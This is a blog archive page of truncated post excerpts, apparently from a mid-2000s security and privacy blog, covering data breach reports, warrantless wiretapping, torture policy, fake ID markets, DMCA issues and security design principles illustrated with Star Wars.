If you haven’t read about Farris Hassan and his trip, take a minute to do so. He flew to Iraq to learn what was going on. I’d like to start by congratulating the teachers at Pine Crest School. How often, today, are teachers so inspiring? The goal of school should be to develop both a […]

 

Security Stickers

Today I received a great ad for a newish security company, Devicewall. They are yet another company providing a solution for prevention of intellectual property theft. They sent me a stack of humorous stickers saying things like: “This Computer is Protected by BRSD Technology. Big Red Sticker of Doom technology leverages our natural fear of […]

 

Illicit

Illicit, by Moisés Naím is a tragic book. It is considered, insightful, wide-ranging, deep, and so close to amazing. Had Naím gone just a little further, it could have been brilliant, and the tragedy is that he didn’t. Perhaps I should back up, and explain. Naím is the editor of Foreign Policy. He has written […]

 

H&R Block, Unknown # of SSNs, Mailing Labels

Stories like this one make me scratch my head and wonder, what is a breach? What should this category cover? Why do I blog these things? Why are we here? Why are you here? And what are those clowns doing over there? However, since we sent you this CD, we have become aware of a […]

 

University of San Diego, 7800 people, W-2 information, "hackers"

One that I missed. The executive summary is that somebody, somehow, got into the machine that prints W-2s for the university. The University sent out an undated disclosure letter which was very sparsely detailed — “one of the worst” seen by Beth Givens of privacyrights.org, who’s seen plenty of ’em. Story is at the San […]

 

Iowa State (again!), 3000 SSNs+2500 encrypted CC#s, "hacker"

The Des Moines Register reports on a December, 2005 breach at Iowa State: [3,000 ISU employees’] personal data might have been viewed by hackers who infiltrated two computers earlier this month. One held about 2,500 encrypted credit card numbers of athletic department donors. The second computer contained Social Security numbers for more than 3,000 ISU […]

 

Identity Theft Poster Girl

…may just have been found! The Associated Press reports that Fashion model Beverly Peele was arrested on identity theft charges for allegedly buying around $10,000 worth of housewares, appliances and furniture by using credit card numbers without permission, authorities said Friday. […] The complaint filed against the 30-year-old alleges she charged furniture, a refrigerator, a […]


Slipping through the analog hole

I have a number of LPs which gradually I am ripping to disc, using The Analogue Ripper (which is adequate but I’m not raving). At the moment, I’m recording an old blues album I haven’t listened to in probably ten years. Naturally, then, I thought of “The UPS Song”, which you can even listen to. […]


WMF Vuln fix

Courtesy of IDA Pro developer Ilfak Guilfanov. Details are available via his web log, the existence of which I learned via the seemingly indefatigable Thomas Ptacek of Matasano.


Totally unforeseeable.

Herbicide-resistant genetically-modified crops cross-breeding with weeds? Shocking. Via Slashdot.


The New York City Police Riots

… The arrest of Mayor Wood was ordered. Captain Walling of the Metropolitan Police was sent to arrest the Mayor but was promptly thrown out on his ear. Wood occupied City Hall protected by 300 of his Municipals who resisted a force of 50 Metropolitans sent there to arrest him. Later that day 50 Metropolitan […]


Gartner to Visa, MasterCard: Play fair

Oft-quoted Gartner analyst Avivah Litan weighs in on the intriguingly gentle treatment of Sam’s Club by Visa and MasterCard: Recommendations […] * MasterCard and Visa: Show far greater transparency in enforcing PCI standards. There is still too much confusion about the standard and how to comply with it — confusion that is increased by seemingly […]


Fingerprint Readers and the Economics of Privacy

I used to feel bad advocating for privacy laws. I’m generally down on laws restricting private contracts, and privacy laws seemed to be an intellectual inconsistency. I’ve resolved that feeling because a great many privacy-invasive systems depend on either social security numbers or government-issued identity documents. It seems quite consistent to restrict […]


How To Train Users

[Update: I had accidentally linked an out of stock edition on Amazon. The new link has copies in stock.] Part of me thinks that training users is a cop-out. It’s a way for the technology industry to evade responsibility for the insecurity of their products, and blame customers for manufacturers’ failings. At the same time, […]


Mossberg's Mailbox

This week’s Mossberg’s Mailbox has a great point, that I can’t resist sharing: “However, I feel compelled to note that, if you allow your Internet usage to be totally ruled by security fears, you may miss out on a lot.” He then goes on to discuss some of the always on benefits such as automatic […]


Two on the Iraqi Army

A spokesman for the American military command that oversees training of the Iraqi forces also said that while he did not know the security forces’ ethnic mix, he believed that there were more Sunni troops than the election data suggested. From the New York Times, “Election Results Suggest Small Role For Sunnis in Security Forces.” […]


Marriott Vacation Club, 206,000 records, backup tape

Marriott International Inc.’s time-share division said yesterday that it is missing backup computer tapes containing credit card account information and the Social Security numbers of about 206,000 time-share owners and customers, as well as employees of the company. Officials at Marriott Vacation Club International said it is not clear whether the tapes, missing since mid-November, […]


London and Terror Threats

The BBC reports that the Mayor of London says “there had been 10 attempted attacks since 11 September 2001, two of which had come since the 7 July bombs.” (“Threat to London ‘disorganised’”) Where are the perpetrators? Are they free, because of insufficient evidence? Are they in jail? Were they killed by security forces? Claims […]


Those Boy Scouts…Always Building Nuclear Reactors

Now 17, David hit on the idea of building a model breeder reactor, a nuclear reactor that not only generates electricity, but also produces new fuel. His model would use the actual radioactive elements and produce real reactions. His blueprint was a schematic in one of his father’s textbooks. Ignoring safety, David mixed his radium […]


13 Meter Straw Goat Met His Match

I am deeply saddened to have missed this story until now: Vandals set light to a giant straw goat Saturday night in a central Swedish town, police said, an event that has happened so frequently it has almost become a Christmas tradition. It was the 22nd time that the goat had gone up in smoke […]


Relentless Navel Gazing, Part 6

I’ve made a bunch of changes to style and template stuff. Most noticeable should be that post titles are now links to the posts. There’s also a whole lot of consistency improvements for the Movable Type 3.2 software. The one remaining change is to bring full (extended) entries into the RSS feed. That MT 3.2 software […]


BancorpSouth, 6500 debit cards, unknown

In a report remarkable for what it doesn’t say, WLBT TV of Jackson, MS reports: A possible security breach has one bank giving customers new debit cards. BancorpSouth is sending out new cards to about 6500 customers. The vice president of the banks security department says account numbers were either lost or they were somehow […]


USA 0, UK 1

We get Mystery Science Theater 3000, they get Badly Dubbed Porn: Badly Dubbed Porn showcases vintage soft porn movies re-dubbed with a wickedly funny soundtrack by some of Britain’s most talented comedy actors. Via the lovely and very funny Ms. Kitka.


Holiday Charity

I’d like to draw your attention to two worthy causes: Tor, and the Creative Commons. Larry Lessig is looking to raise money to ensure that the Creative Commons maintains their non-profit status, and the fine folks who bring you the Tor Internet privacy tool are looking for donations so they can continue their important work.


Florida workers claim outsourced HR system reveals PII, lacks audit trail

The Tallahassee Democrat reports on an interesting disclosure instance: whistleblowers revealing allegedly shoddy data security practices at their former employer. The twist is that those doing the talking are not the folks whose jobs were outsourced, but former employees of the outsourcing firm. From the article: In an affidavit taken for a lawsuit by five […]


US Department of Justice, several SSNs, Process Errors

The federal government is responsible for issuing Social Security numbers, but it may not be doing enough to protect these critically personal pieces of information on its own Web sites. Acting on a tip, InformationWeek was able to access Web pages that include the names and Social Security numbers of people involved in Justice Department-related […]


Apollo 8

From the good old days, when science was not a matter of press releases, perception management or “long held beliefs.” Click the picture for a larger version at Astronomy Picture of the Day.


Dodo bones

Scientists have discovered the “beautifully preserved” bones of about 20 dodos at a dig site in Mauritius. Little is known about the dodo, a famous flightless bird thought to have become extinct in the 17th century. No complete skeleton has ever been found in Mauritius, and the last full set of bones was destroyed in […]


Nuclear Surveillance

In search of a terrorist nuclear bomb, the federal government since 9/11 has run a far-reaching, top secret program to monitor radiation levels at over a hundred Muslim sites in the Washington, D.C., area, including mosques, homes, businesses, and warehouses, plus similar sites in at least five other cities, U.S. News has learned. In numerous […]


Friday Star Wars and Psychological Acceptability

This week’s Friday Star Wars Security Blogging closes the design principles series. (More on that in the first post of the series, “Economy of Mechanism.”) We close with the principle of psychological acceptability. We do so through the story that ties the six movies together: The fall and redemption of Anakin Skywalker. There are four […]


Shark Video

Watch this astounding video of a shark in the Seattle aquarium. I suggest turning down the volume; the only really useful thing you’ll learn is that the shark in question was about 3-4 feet long. Via TEDBlog


More on Snow's Assurance Paper

This is a followup to Gunnar Peterson’s comments on “Epstein, Snow and Flake: Three Views of Software Security.” His comments are in an update to the original post, “The Road to Assurance:” None of these views, by themselves are adequate. The combination of horizontal and vertical views is what yields the most accurate picture. Obviously, […]


It's Chaos Out There!

In “Play Break,” Hilzoy writes: Here’s what it’s about: as most parents know, little boys tend to be more interested in toys like trucks, and little girls in toys like dolls. (I was an exception: someone gave me a doll once, and I dissected it.) There is no obvious way to decide whether this is […]


Do Wiretap Revelations Help the Terrorists?

The question is a fair and natural one to ask, and I’d like to examine it in depth. I think my intuitive answer (“revelations about wiretaps don’t help the terrorists”) is wrong, and that there are surprising effects of revealing investigative measures. Further, those are effects I haven’t seen discussed. Allow me to explain the […]


Ford, 70,000 Employee SSNs, Stolen Computer

Ford Motor Co. informed about 70,000 active and former white-collar employees that a computer with company data, including social security numbers, was stolen from a Ford facility. From the WSJ, “Ford Computer Holding Staff Data Is Reported Stolen.” “Where Identity Theft is Job #1!”


Epstein, Snow and Flake: Three Views of Software Security

Among those who understand that software is, almost without exception, full of security holes, there are at least three major orientations. I’ve recently seen three articles, all of which I wanted to talk about, but before I do I should explain how I’m using the word orientation, and the connotations it carries. As used by […]


Update on ABN Amro (Lasalle Bank) tape

Lasalle Bank’s tape of mortgage-related information on 2 million customers has been found by DHL. (Thanks to Adam for the heads-up) No word on whether the tape was in a container which would show evidence of tampering, so this doesn’t foreclose (pardon the pun) the possibility of PII being stolen: […]the tape had been located […]


Even More on the $100 Laptop

I’ve discussed the $100 laptop in “Freedom To Tinker, Freedom to Learn,” and “More on ‘Freedom To Tinker, Freedom to Learn’.” In “Tech Delusions and The Trouble with Christmas,” Kerry Howley discusses many reasons why this is a bad idea: For now, OLPC plans to sell only to governments of poor countries, not individuals here […]


Emergent Properties of the Long Tail

Chris Anderson warms the cockles of our heart as he discusses the psychological acceptability of “The Probabilistic Age:” When professionals–editors, academics, journalists–are running the show, we at least know that it’s someone’s job to look out for such things as accuracy. But now we’re depending more and more on systems where nobody’s in charge; the […]


Software Usability Thoughts: Some Advice For Movable Type

I’d like to talk a bit about usability as it intersects with software design. I’m motivated by three things: Firstly, my own attempts to be comprehensible and understandable, not only in this blog, but also in software whose design I participate in. Years ago, Steve Karkula provided me the phrase “design from interface” while doing […]


I'll have to check with my manager

If you watch “The Simpsons”, you’ve probably seen “Puberty Boy”, the pimply-faced kid who appears in many episodes in a variety of menial jobs. Well, it looks like he may be working for the NSA: Q If FISA didn’t work, why didn’t you seek a new statute that allowed something like this legally? ATTORNEY GENERAL […]


Guidance Software, 4,000 CC+CCV, Hacker

Or, “I Wonder How They Figured It Out.” Online attackers breached the security of a server at digital forensics firm Guidance Software and stole the account information of nearly 4,000 customers, the company acknowledged on Monday according to news reports. From Rob Lemos, “Customer Data Stolen From Guidance Software.”


Legal Analysis of the Wiretaps

One of the really cool things about blogs is that very smart, knowledgeable people can offer up their opinions on topics of the moment. In this case, it’s Orin Kerr and Daniel Solove offering up extended legal analyses of the wiretaps. (Well, extended from the lay perspective, anyway.) Professor Kerr has posted “Legal Analysis of […]


Snarfer RSS Reader

Some friends have just launched Snarfer, a new Windows RSS reader, designed to be fast, efficient, and easy to use. Check it out! If you’re not familiar with RSS Really Simple Syndication, it’s a way to bring lots of content, like blogs, into one place. If I didn’t have NetNewsWire (a Mac client) I couldn’t […]


Reeves Namepins, Unknown # Cop Credit Cards, Hacker

Reevesnamepins.com, a company that manufactures the plastic and metal name tags that police officers around the country wear on their uniforms, had its customer database hacked recently, exposing credit card and other personal data for a number of police departments. So writes Brian Krebs in “Database Hack Exposes Police Financial Data.”


OSVDB Needs Programmers

The Open Source Vulnerability DataBase (OSVDB) is in need of additional programmers. If you’re not familiar with it because you’ve been hiding in a cave somewhere, OSVDB is a tremendous project that dramatically enhances the quality and availability of vulnerability information. Today, they posted a teaser, “OSVDB is Closing:” That said, OSVDB could substantially benefit […]


Torturing The Norms

Of a Financial Times online poll about torture, Alice Marshall asks “How did this even get to be part of the conversation?” Meanwhile, the BBC reports on the investigation of a Swiss Senator in “CIA abduction claims ‘credible:’” He went on: “Legal proceedings in progress in certain countries seemed to indicate that individuals had […]


"L'état c'est moi"

Via USA Today: Days after the Sept. 11 attacks, the head of the National Security Agency met his workforce at the nation’s eavesdropping and code-breaking headquarters at Fort Meade, Md., near Washington, for a pep talk. “I told them that free people always had to decide where to draw the line between their liberty and […]


America Needs a Full Time President

Ryan Singel has a post “Bush Wiretaps Supremely Illegal,” in which he discusses how this aspect of wiretaps is settled law. Perry Metzger’s excellent “A small editorial about recent events” is also worth reading: As you may all be aware, the New York Times has reported, and the administration has admitted, that President of the […]


Meth Addicts and ID Theft

There’s a great article in USA Today, “Meth addicts’ other habit: Online theft.” Unlike many articles of this type, the reporting is measured and carefully reported, and full of details that make it believable: One dumpster behind a call center in suburban Mill Woods proved to be a jackpot. In a nondescript strip mall just […]


Managing and the Red Cross

The other day on “On Point,” I heard some astoundingly clear exposition of executive management, in the words of Dr. Bernadine Healy, the former CEO of the Red Cross. The program, Examining The Red Cross was promoted as: When 9/11 came, the Red Cross was there — with mountains of Americans’ donations and support for […]


Bugger Frequent Flyer Miles

I want Frequent Flyer Hours. They’d work almost the same. You’d get 550 or so points per hour from gate to gate. So all that time, sitting on the runway, circling in a holding pattern, waiting for the previous plane to vacate your gate? All would be paid back in some small way to the […]


The shame of it all

[Adam updates: The reporter has recanted his story, “Federal agents’ visit was a hoax.”] Apparently, the Stasi are watching what we read. A senior at UMass Dartmouth was visited by federal agents two months ago, after he requested a copy of Mao Tse-Tung’s tome on Communism called “The Little Red Book.” Two history professors […]


Government Secrecy and Wiretaps

I’d like to respond to Dan Solove’s article “How Much Government Secrecy Is Really Necessary” with the perspective of a veteran of the 1990s crypto wars, in which we fought the NSA for the practical right to build and use encryption to protect sensitive data. A central tenet of the government’s position was that there […]


Lasalle Bank, 2 million mortgagees, SSNs, acct #s, "lost" tape

From Crain’s Chicago Business: LaSalle Bank Corp. says a computer tape bearing confidential information on about 2 million residential mortgage customers disappeared last month as it was being transported to a consumer credit company in Texas. The Chicago bank has alerted law enforcement authorities and is also monitoring transactions closely to detect any unusual or […]


Friday Star Wars: Open Design

This week and next are the two posts which inspired me to use Star Wars to illustrate Saltzer and Schroeder’s design principles. (More on that in the first post of the series, Star Wars: Economy Of Mechanism.) This week, we look at the principle of Open Design: Open design: The design should not be secret. […]


NSA Spying on Americans Without Warrants

“Bush Secretly Lifted Some Limits on Spying in U.S. After 9/11, Officials Say.” A 10 page story in the New York Times opens: Months after the Sept. 11 attacks, President Bush secretly authorized the National Security Agency to eavesdrop on Americans and others inside the United States to search for evidence of terrorist activity without […]


"What if Copyright law were strongly enforced…"

I can’t tell you how strongly tempted I am to just steal Daniel Solove’s “What If Copyright Law Were Strongly Enforced in the Blogosphere?” It’s a great article, and it would be deeply, deeply ironic for that article to be at the center of a lawsuit over copyright infringement.


No good deed goes unpunished

The folks at the Alabama Credit Union were informed that 500 of their customers were among those whose payment card information was stolen in the Sam’s Club breach. They took a conservative approach and reissued the cards for all 500 customers, and also informed them of the breach. As we’ve commented on previously, information concerning […]


White Wolf, Unknown number of Passwords, Hackers

The game company White Wolf is going offline because of internet attacks. This is a blending of several trends: Fuller disclosure of incidents, attackers who are only in it for the money, and the economic impact of attacks. Dear White Wolf Users, Like many other well-known companies of the last few years, White Wolf was […]


Conference News

Shmoocon has announced their 2006 speaker list. Today is the last day to submit to Codecon.


Insurance Claims and Privacy

One of the biggest issues I have with the gossip industry is how behavior that seems normal and expected is entered into databases and is used to judge us in unexpected ways. As the Tampa Tribune reports in “Insurers’ Road Service Could Prove Costly:” TAMPA – Andrea Davis can’t understand what two flat tires and […]


SANS.edu

Via Bejtlich, I learned that SANS is now offering degree programs. I have not been able to determine whether they are an accredited institution of higher learning, however.


Firm breached in Scottrade incident to sell business unit

From the press release: SALT LAKE CITY, Dec. 13 /PRNewswire-FirstCall/ — silex technology america, Inc. and TROY Group, Inc. signed a definitive agreement effective today stating that silex technology america will acquire the Wireless & Connectivity Solution Business of TROY Group, Inc. […] “We are pleased to announce this transaction as we believe that the […]


Fake Fingerprints

Fingerprint scanning devices often use basic technology, such as an optical camera that takes pictures of fingerprints which are then “read” by a computer. In order to assess how vulnerable the scanners are to spoofing, Schuckers and her research team made casts from live fingers using dental materials and used Play-Doh to create molds. They […]


Torturing People

Last week, Secretary of State Condoleezza Rice made a speech in which she made apparently definitive statements about our policies towards torture. See Jack Balkin, “Rice: ‘U.S. Personnel’ Don’t Engage in Cruel, Inhuman and Degrading Treatment ‘Wherever They Are.’” Then be sure to see Marty Lederman’s follow-up, “Condi Rice’s ‘No Torture’ Pledge: Don’t Believe the […]


"Aid to the Church in Need", 2000 donors to charity, "personal details"

Not sure if the personal details obtained by hackers include CC#s, but names and addresses are certainly involved in this breach at a UK charity. A couple of interesting twists to this one, as reported at Silicon.com. First, the thieves weren’t content with just stealing the info — they used it to extort victims directly: […]


Web Certificate Economics

In a comment on “Build Irony In,” Frank Hecker writes: First, note that the “invalid certificate” message when connecting to buildsecurityin.uscert.gov using Safari is *not* because the certificate is from an unknown CA (or no CA at all); it’s because the certificate is issued to the server/domain buildsecurityin.us-cert.gov (note the dash) and thus doesn’t match […]


Tracking Graz (Austria)

Speaking of tracking and databases: Mobile Landscape Graz in Real Time harnesses the potential of mobile phones as an affordable, ready-made and ubiquitous medium that allows the city to be sensed and displayed in real-time as a complex, pulsating entity. Because it is possible to simultaneously ‘ping’ the cell phones of thousands of users – […]


Planespotters vs. the CIA

Ever-increasing requirements that every item be uniquely identifiable are combining with the power of the internet to invade everyone’s privacy. The Guardian (UK) has a story about how ‘planespotters’ are gathering data that allows the after-the-fact tracking of CIA torture planes. (“How planespotters turned into the scourge of the CIA.”) Paul last saw the Gulfstream […]


Passwords: Lessons for Japan Airlines from Harry Potter

This is weak authentication in all its glory. The password is shared by every member of a House. It is a static password, changed annually. Moreover, the fat lady’s password challenge never asks students for identity. I cannot recall any incident where a house ghost barred entrance to a student because he was a member […]


Star Wars and Separation of Privilege

As we continue the series, illustrating Saltzer and Schroeder’s classic paper, “The Protection of Information in Computer Systems,” we come to the principle of separation of privilege. Separation of privilege: Where feasible, a protection mechanism that requires two keys to unlock it is more robust and flexible than one that allows access to the presenter […]


Estimating breach size by fraud volume

Much is being made of a press release from ID Analytics. Based on results from that firm’s fraud detection products, a conservative estimate is that one of every 1000 pieces of PII lost in a data breach results in an actual fraud. An additional finding is that the likelihood of a fraud being committed using […]


Is the Database Half-Wrong, or Half-Right?

More than 8,000 people have been mistakenly tagged for immigration violations as a result of the Bush administration’s strategy of entering the names of thousands of immigrants in a national crime database meant to help apprehend terrorism suspects, according to a study released on Thursday. The study, conducted by the Migration Policy Institute, a research […]


0Day on Ebay

“Brand new Microsoft Excel Vulnerability:” The lot: One 0-day Microsoft Excel Vulnerability Up for sale is one (1) brand new vulnerability in the Microsoft Excel application. The vulnerability was discovered on December 6th 2005, all the details were submitted to Microsoft, and the reply was received indicating that they may start working on it. It […]


Elements of Blogging Style

I’ve often thought that I over-analyze some things. But as I enjoy blogging, I’ve come to realize that having standards about the little things helps me write faster and more effectively. More importantly, I hope, they allow you to skim here faster, and retain more of what you’re reading. Bloggers who want to be read […]


Deborah Davis Charges Dropped, Rally to Proceed

Ann Harrison reports: The government dropped all charges against Deborah Davis yesterday for failing to show her ID on a Denver public bus. Officials claim that passengers still have to show ID to transit through the Denver Federal Center, but said there were no clear signs to inform them of this requirement. Davis’ lawyers are […]


EPIC on RFID Passports

According to documents (pdf) obtained by EPIC under the Freedom of Information Act, a government report found significant problems with new hi-tech passports. Tests conducted last year revealed that “contactless” RFID passports impede the inspection process. At a meeting of a Privacy Advisory Committee today in Washington, EPIC urged (pdf) the Department of Homeland Security […]


Muffett on Passwords

In “OpenSolaris, Pluggable Crypt, and the SunMD5 Password Hash Algorithm,” Alec Muffett writes: Several years ago now, Darren Moffat, Casper Dik and I started swapping e-mail about how pathetic it was to still be using the traditional 8-character-password unix crypt() routine in Solaris, and how we could architect something to be much better. You’d have […]


Sam's Club, CC #'s and more?, they're not saying

American Banker (12/7/2005) reports [warning: paywall] on the tight-lipped reaction of Sam’s Club, MasterCard, and Visa to a recent data breach involving credit and debit card mag stripe data from Sam’s Club gas stations. The affected cards seem to have been primarily from two issuers, and hundreds of actual frauds have already occurred. Nobody is talking […]


A little knowledge is a dangerous thing

Bruce Schneier demonstrates the truth of the old saying in a must-read blog entry. In a nutshell, Nature published an article written by a physicist with little or no background in cryptography, claiming to have devised a mechanism for optically transmitting encrypted messages using a “chaotic carrier”. Bruce trains his skeptical and expert eye on the […]


Tens of Thousands Mistakenly on Watchlists

[Important update below] Nearly 30,000 airline passengers discovered in the past year that they were mistakenly placed on federal “terrorist” watch lists, a transportation security official said Tuesday. Jim Kennedy, director of the Transportation Security Administration’s redress office, revealed the errors at a quarterly meeting convened here by the U.S. Department of Homeland Security’s Data […]


Hey, Look, It's Matasano!

Tom Ptacek’s blog is full of smart people introducing themselves, and their new company, Matasano. They’re talking about the new mix, which is to be consultants while you build your startup and look for funding. I hope that Window, Dave, and Jeremy all get the blogging bug. Heck, I hope Dino does too, because with […]


Economics of Fake ID (Kremlin Edition)

Russian security agents have arrested a group of policemen and civilians suspected of forging Kremlin passes. The items seized included identity cards guaranteeing entry to President Vladimir Putin’s offices, the FSB security service said. … According to security officials, some of the items were being sold at a car market in the south of Moscow, […]


Fighting Terror: Police, not Armies

Democracies do not fare well with military dictators, nor when entrusted to overpowering and internally focused armies. Armies are trained, quite rightly, to kill and ask questions later. Police forces are trained to exercise discretion, sustain the rule of law, respect human rights, understand the freedoms we have embodied neatly in a Bill of Rights […]


Speaking of Ethical: Brad Feld on Philanthropy

I’d like to draw attention to venture capitalist Brad Feld’s post, “Doing Good By Doing Well:” I’ve strongly encouraged my portfolio companies to incorporate “philanthropic activities” into their businesses early in their life. I don’t advocate any particular focus – I simply encourage founders and leadership teams to think about what they can do to […]


Ethical Behavior

Chuck Tanowitz has an interesting post “Ethicist in the Boardroom?” in which he expounds on … a discussion with Phil Libin a while back he suggested that companies should have an ethicist on board. More specifically, he suggested an outside ethics consultant to help keep them on track. The post is worth reading in its […]


American Torture Chambers

After the Second World War, Germans claimed they didn’t know what was being done to Jews, Catholics, Gays, Gypsies and others by their government. We, as Americans, have no such excuse. We know what’s being done in our name, and have failed to stop it. The American government is torturing prisoners, and sending prisoners to […]


Like Taking Candy from a Database

Candice “Candy” Smith, 44, of Blue Springs, Mo., pleaded guilty to making unauthorized inquiries into data aggregator LexisNexis’s database of non-public information on millions of consumers, such as driver’s license information and credit-history data. Many people might assume that only cops can look up this type of information, but Smith was granted access to the […]


Guerrilla Identity Protection

Next time you call customer service to manage one of your accounts and they ask you for pseudo-private information like your SSN or Mother’s maiden name, ask them for their name. When they ask why (feel free to prompt since this probably isn’t completely out of the ordinary) let them know that you are keeping […]


More on What Not To Get Me, Or Anyone

Bob Sullivan has a good post, “Gift card fees still playing Scrooge:” How much is that $50 gift card really worth? Well, it’s hard to say. The art of irritating and sneaky fees has reached new heights in this 21st century version of gift certificates. There are sign-up fees, transaction fees, dormancy fees and outright […]


Disclosure Rules are Changing (Salem, MA Schools, 'several dozen psych profiles')

A school psychologist’s records detailing students’ confidential information and personal struggles were accidentally posted to the school system’s Web site and were publicly available for at least four months. … The psychological profiles, some dating back more than a decade, contained children’s full names, birthdays and, in many instances, IQ scores and grades, the newspaper […]


It's Christmas Time in New Orleans

It’s no ordinary holiday season in the Gulf Coast this year, so Frank Evans built an unconventional holiday display at a suburban New Orleans shopping mall to match. He thought the tiny blue-tarped roofs, little toppled fences and miniature piles of hurricane debris in the display he builds annually for the mall struck just the […]


Cornell, 900 SSNs, "breach"

Cornell employees this past summer discovered a security breach on a computer that contained personal information, such as names, addresses, social security numbers and bank names and account numbers. After conducting an analysis of the breach, Cornell Information Technology (CIT) did not find evidence that any information stored on the computer had been inappropriately accessed. […]


Nick Szabo Blogging

Nick is a premier thinker about history, law and economics, and the lessons they have for security. Take this brief sample from “Origins of the joint-stock corporation:” The modern joint-stock corporation has many sources in medieval Europe. First among these was corporate law itself. Although the era is commonly referred to as “feudalism,” for the […]

 

Star Wars and Least Common Mechanism

Today, in Friday Star Wars Security blogging, we continue with Saltzer and Schroeder, and look at their principle of Least Common Mechanism: Least common mechanism: Minimize the amount of mechanism common to more than one user and depended on by all users [28]. Every shared mechanism (especially one involving shared variables) represents a potential information […]

 

The Future of Scientific Research

There’s a fascinating set of articles in Nature this week on openness, sharing, and new publication models. From “Science in the web age: Joint efforts:” “Science is too hung up on the notion of ‘the paper’ as the exclusive means of scientific communication,” says Leigh Dodds, a web expert at the publisher Ingenta. Publication and […]

 

DMCA vs. Security Research

Last month, I commented on how the DMCA was preventing research on spyware: …the legal cloud that overhangs this sort of research. That legal cloud was intentionally put there by the copyright industry, in the form of the Digital Millennium Copyright Act. The law makes it hard to understand what research you can perform when […]

 
 

Costs of Breaches

The Ponemon Institute continues to analyze the cost of breaches. Their latest work is distributed by PGP, Inc. The work that they’re doing is quite challenging and useful, but is unlikely to be a complete accounting of the costs. For example, what’s the real cost of the brand damage done to Choicepoint? Along with several […]

Fake ID Markets

Social Security cards run about $20, green cards about $70 and a California driver’s license between $60 and $250. The price jumps up for higher-quality documents, such as IDs with magnetic strips containing real information — often from victims of identity theft. … “You name it, they can make it,” said Los Angeles Deputy City […]

More info, thoughts on Troy Group breach

In an interesting article, The St. Louis Post Dispatch reports new information about the recent breach of the “eCheck Secure” system run by Troy Group. According to the article, the number of potential Scottrade victims is 140,000. Troy Group published a news release revealing they got hacked, and notified their financial sector customers, including Scottrade, […]

EFF: Why Bother With DMCA comments?

The EFF has decided that the DMCA “rulemaking process is simply too broken” for them to bother commenting on it any further. See “DMCA Triennial Rulemaking: Failing Consumers Completely:” EFF has participated in each of the two prior rulemakings (in 2000 and 2003), each time asking the Copyright Office to create exemptions for perfectly lawful […]

Netgear WGPS606 and Mac Printing

I recently bought a Netgear WGPS606 ‘print server.’ It’s a nifty little device with a 4-port 100 Mbps Ethernet switch, a wireless bridge, and an LPD print service. I needed each of those as part of reconfiguring my office space, and here it was in one little package. It turned out to be something of […]

NJ's Strong Privacy Law

Apparently, I woke up on the right side of the bed, and am just handing out kudos left and right today. Consumers will gain strong new protections when New Jersey’s Identity Theft Prevention Act takes effect Jan. 1, but businesses and institutions are facing headaches and added expenses. Social Security numbers will be out as […]

UNC Addresses Risk Systemically, Rather than Piecemeal

Students are currently recognized by their Social Security Number in many University systems and applications. With the growing threat of identity theft, an alternative method has been desired for identifying students and faculty. The opportunity to execute this change has surfaced through the implementation of an updated University [of North Carolina] computer system. Kudos to […]

TSA to Revise Rules

[Updated with data from NYT] A new plan by the Transportation Security Administration would allow airline passengers to bring scissors and other sharp objects in their carry-on bags because the items no longer pose the greatest threat to airline security, according to sources familiar with the plans. The TSA’s internal studies show that carry-on-item screeners […]

Centers for Disease Control Want To Track All Travel

In “CDC plans flight e-tracking,” Bob Brewin of Government Health IT writes: Battling a pandemic disease such as avian flu requires the ability to quickly track sick people and anyone they have contacted. In response, Centers for Disease Control and Prevention officials have proposed new federal regulations to electronically track more than 600 million U.S. […]

Web Browser Developers Work Together on Security

Adam’s post earlier today on efforts to improve browser security reminded me about this post on KDE.news. George Staikos hosted a meeting of developers from Opera, IE, Mozilla/Firefox and Konqueror with an aim towards improving browser security across the board. Of particular interest to me, in light of my intro post, were these two lines: […]

More on Deborah Davis

The story of Deborah Davis is getting lots of attention. Rob sent me Refusal to present ID sparks test of rights, which includes: “I boarded the bus and spoke with the individual, Deborah N. Davis . . . asking why she was refusing,” wrote the first Federal Protective Service officer in an incident report posted […]

Effective Privacy Law Requires Penalties

Michael Geist has a column today “Canada’s Privacy Wake-Up Call” in which he follows up on the Maclean’s story about the Canadian Privacy Commissioner’s phone records being stolen. (See my “Epic Problems With Phone Privacy.”) Although major Canadian telecommunications providers such as Bell Canada sought to characterize themselves as “victims” of fraudulent activity and claim […]

Don't Tell People What Not To Do!

[Update: If I’d been able to find the page which Arthur provided in a comment, I wouldn’t have written this quite like this.] It’s rare to see a substantial usability mistake at Google, and so this jumped out at me. Saar Drimer has a post on the new “Gmail password strength check,” in which he […]

Hoder's Denial

Recently, Hossein Derakhshan blogged about his denial of entry into the United States. (“Goodbye to America.”) This is really too bad. Hoder’s an insightful fellow, and even if he happened to be one of the 15 or so million living in the United States without official permission, we profited from his visits. I believe that […]

Defensive driving

As most parents of young children would no doubt attest, when driving with “precious cargo” — lives you particularly want to protect — you typically take extra precautions. Special safety seats with five point harnesses, specialized mounting hardware, taking that bit of extra care that maybe you wouldn’t if driving alone. Well, that may all […]

On Torture

I sometimes feel that I have nothing to add to the “debate” around torture, other than the formerly-obvious “torture is ineffective and morally repugnant.” Nevertheless, I feel that keeping silent, or even allowing the debate to occur without adding my voice to the chorus of reason. So, some others’ posts this past week: In Jack […]

Scottrade, Millions of "E-secure" system users, SSNs, account numbers, etc, "hacker"

Info is spotty on this, but according to a WFMY TV News report, Millions of names, addresses, social security numbers, and bank account numbers could be in dangerous hands. Officials with Scottrade, an investment company with an office in Greensboro say a security breach compromised the information of some of its account holders. A letter […]

Books: "Innocent Code" and "19 Deadly Sins"

I’m going to review Innocent Code (IC) and The 19 Deadly Sins of Software Security (19DS) in the same review because I think they’re very similar in important ways. There have been probably close to a dozen books now on writing code with good security properties. Many of the early ones had to lay out […]

Make Mine Sony-Free

As the holiday and gift-shopping season arrives, I’d like to talk about what not to get me (or really, anyone on your list). A bad gift is really painful to receive. You have to put on a fake smile and pretend to be happy, and then go return the thing at the first opportunity. My […]

No Friday Star Wars Security Blogging Today

Blame Tom Ptacek for ignoring my heroic efforts. My being off with family this week has nothing to do with it. Friday Star Wars Security posts will return next week, with the principle of Least Common Mechanism.

Happy Thanksgiving!

As you enjoy your Turkey, recall that the Pilgrims who ended up in Plymouth were fleeing the Anglican church, England’s state religion. The English church, of course, split from the Roman church so that Henry VIII could get a divorce. The little people, however, were not allowed the chance to split their churches in quite […]

My Software is Mine.

People often become emotionally entangled with the software they use. It’s not a geek-only thing, although geeks often become more entangled with a broader range of the software they use. Normal people speak of “My Excel is screwed up,” or feel bad that their Sony CD has messed things up for them. One of the […]

Australian Minister Vanstone on Stupid Security

